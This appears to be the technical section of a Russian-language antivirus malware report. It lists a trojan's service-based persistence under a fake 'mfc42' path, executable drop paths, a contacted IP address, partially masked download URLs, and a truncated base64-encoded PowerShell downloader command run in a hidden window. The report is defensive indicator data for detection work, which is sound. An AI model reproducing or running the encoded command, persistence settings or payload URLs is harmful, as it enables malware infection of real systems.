Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mfc42] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mfc42] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDTH2\mfc42.exe"'
- 'mfc42' "%WINDIR%\SysWOW64\KBDTH2\mfc42.exe"
- 'mfc42' %WINDIR%\SysWOW64\KBDTH2\mfc42.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABVAGUAdgB3AHoAZwB6AD0AKAAoACcAQgAnACsAJwBrAG4AdAAnACkAKwAoACcANAA1ACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AVgA6AHUAcwBFAHIAcAByAE8ARgBpAGwAZQBcA...
- %HOMEPATH%\yv3wm9g\wzn78e8\tii0bcp.exe
- %WINDIR%\syswow64\kbdth2\mfc42.exe
- %HOMEPATH%\yv3wm9g\wzn78e8\tii0bcp.exe в %WINDIR%\syswow64\kbdth2\mfc42.exe
- '24.##.32.186':80
- http://ha####etrading.com/wp-includes/yGELKj4/
- http://24.##.32.186/Z8PVlrR5hYiK8Dh/gT8D8nDa2rg/kHtCRErk/bZRtQuCW7X60ATd7B/FxWo/oKI54Kot4q44BEN/
- DNS ASK ha####etrading.com
- '%HOMEPATH%\yv3wm9g\wzn78e8\tii0bcp.exe'
- '%WINDIR%\syswow64\kbdth2\mfc42.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABVAGUAdgB3AHoAZwB6AD0AKAAoACcAQgAnACsAJwBrAG4AdAAnACkAKwAoACcANAA1ACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AVgA6AHUAcwBFAHIAcAByAE8ARgBpAGwAZQBcA...' (со скрытым окном)